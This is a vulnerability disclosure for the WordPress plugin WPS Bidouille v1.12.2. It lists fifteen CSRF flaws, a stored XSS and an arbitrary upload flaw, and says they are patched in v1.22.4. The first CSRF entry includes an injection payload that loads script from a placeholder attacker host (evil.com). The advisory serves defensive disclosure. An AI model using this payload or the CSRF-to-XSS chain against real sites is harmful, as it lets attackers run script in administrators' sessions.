WPS Bidouille v1.12.2 Multiples Vulnerabilities

WPS Limit Login is edited by WP Serveur, WordPress french host. Criticity level for this update is medium.

CSRF #1

File : /classes/plugin.php

Line 355-358

Function count_notif()

Issue : Lack of nonce token, we can here give this link to a logged-in administrator or include it in a hidden page with POST method:

https://example.com/wp-admin/admin-ajax.php?action=count_notif with param “number” value “<script src=//evil.com/js.js></script>“.

CSRF #2

File : /classes/plugin.php

Function dismiss_admin_notice()

Issue : Lack of nonce token, we can here give this link to a logged-in administrator or include it in a hidden page with POST method:

https://example.com/wp-admin/admin-ajax.php?action=dismiss_admin_notice with param “number” and/or “option_name” and/or “dismissible_length”.

CSRF #3

File : /classes/plugin.php

Function dismiss_admin_notice()`

Issue : Lack of nonce token.

CSRF #4

File : /classes/plugin.php

Function add_option_wps_display()

Issue : Lack of nonce token.

CSRF #5

File : /classes/plugin.php

Function delete_option_wps_display()

Issue : Lack of nonce token.

CSRF #6

File : /classes/plugin.php

Function add_allow_repair_wp_config()

Issue : Lack of nonce token.

CSRF #7

File : /classes/plugin.php

Function remove_allow_repair_wp_config()

Issue : Lack of nonce token.

CSRF #8

File : /classes/plugin.php

Function wpsbidouille_rated()

Issue : Lack of nonce token.

CSRF #9

File : /classes/plugin.php

Function download_log_template_redirect()

Issue : Lack of nonce token.

CSRF #10

File : /classes/plugin.php

Function download_report_system_template_redirect()

Issue : Lack of nonce token.

CSRF #11

File : /classes/plugin.php

Function delete_unuse_plugins()

Issue : Lack of nonce token.

CSRF #12

File : /classes/plugin.php

Function delete_unuse_themes()

Issue : Lack of nonce token.

CSRF #13

File : /classes/plugin.php

Function wp_ajax_save_settings_wps()

Issue : Lack of nonce token.

CSRF #14

File : /classes/plugin.php

Function wps_get_posts()

Issue : Lack of nonce token.

CSRF #15

File : /classes/removefromcache.php

Line 432

if ( isset( $_POST['wps_cache_fields'] ) && ! wp_verify_nonce( $_POST['wps_cache_fields'], basename( __FILE__ ) ) ) {

Issue : Nonce token is not verified if we don’t send $_POST['wps_cache_fields']

The IF condition is not correct, this is:

if ( ! isset( $_POST['wps_cache_fields'] ) || ! wp_verify_nonce( $_POST['wps_cache_fields'], basename( __FILE__ ) ) ) { 

Stored XSS

File /classes/plugin.php

Line 85-88

$notifs = get_option( 'wps_notifs_ajax' );

if ( $notifs ) {
    echo 'Vous avez ' . $notifs . ' notifications.<br><br>';

}

Issue : No escaping or cast or sanitization for the ouput, it was the same on the input. With the previous CSRF a simple subscriber can add content in the admin page like jQuery scripts etc.

Arbitrary Upload File

File /classes/suggest-plugins-themes.php

Everywhere where a nonce is checked like in this function for example:

public static function download_plugins_premium() {

$download_url = $_POST['url'];

check_ajax_referer( 'download-premiums', 'nonce' );

Helpers::download_package( $download_url );

wp_die();

}

We can change the URL, this will be passed in the uploader ofdownload_package(). Remark, you have to be administrator.

These vulnerabilities has been patched in v1.22.4

About Julio Potier All of Julio Potier's posts

Creator of SecuPress and the LearnWPSecurity Training, Julio is also lead organisator of WordCamp Lille.
Compulsive speaker, Senior Trainer and WordPress Engineer, he's a specialist in security since 2002 and contribute to WordPress various ways.